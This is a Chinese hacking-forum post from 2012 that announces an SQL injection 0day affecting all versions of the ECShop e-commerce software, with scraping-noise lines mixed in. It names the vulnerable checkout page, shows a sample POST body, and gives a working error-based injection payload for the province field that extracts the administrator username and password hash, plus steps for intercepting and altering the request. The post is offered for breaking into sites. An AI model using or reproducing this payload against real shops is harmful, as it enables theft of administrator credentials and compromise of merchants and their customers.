中国网络渗透测试联盟
标题:
ECShop全版本SQL注入0day
[打印本页]
作者:
admin
时间:
2012-12-31 09:19
标题:
ECShop全版本SQL注入0day
感谢欠杀的黑盒
: F- s8 |3 z7 d0 r( g6 j- l6 L" G
7 C, R# `5 ]* L7 F! M
/ P1 K( A- K2 B" }2 {6 v7 u, V& m6 |
把任意商品加入购物车在填写配送地址那一页,有地区选择
0 u* V: N K4 _2 L8 b
1 L* @! y# I* t* H$ O
flow.php?step=consignee&direct_shopping=1
* o7 R4 g: ?8 ~( ]( q' U4 I8 n
比如省选择安徽
4 B/ r6 ^3 {; k3 Q9 O1 J! \ `- n U
. v9 |! x3 O* }, y% D% y& g
其中POST数据如下
. r2 L! G) P* `2 I9 y L# W
6 d4 [# Q! N( W6 e: R- Z; M
country=1&province=3&city=37&district=409&consignee=11111&email=11111111%40qq.com&address=1111111111&zipcode=11111111&tel=1111111111111111111&mobile=11111111&sign_building=111111111&best_time=111111111&Submit=%E9%85%8D%E9%80%81%E8%87%B3%E8%BF%99%E4%B8%AA%E5%9C%B0%E5%9D%80&step=consignee&act=checkout&address_id=province=3
! U9 J6 L2 V6 N
改成
5 e, Z! p9 ~9 R# u# ~
! e8 r3 Q' l6 ~* I# |- s8 R8 Q& n
province=3') and (select 1 from(select count(*),concat((select (select (SELECT concat(user_name,0x7c,password) FROM ecs_admin_user limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 #
8 k0 ^6 b9 G2 R6 l( p+ o
ps:详细的方法,用火狐tamper data插件……..即可改post内容…..
% Q9 X( D* ~8 n
8 s/ ?: j, n# ]) J3 E
先注册账户,随便选个商品进购物车,然后填地址,电话什么的,填好开始抓包,改包
& y4 N0 V% R! k9 g4 m8 ^
) `! W) @6 ^# }
就会回显错误页面了。。。。
/ }/ j, }' z7 s" l; \
; Y% p4 d2 j! r9 N. d) s5 ~ W
我自己没用这个日站过,就测试了一个最新版和老版本,均ok,所以写全版本,理论上应该是的
( U) F" |0 J. S
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2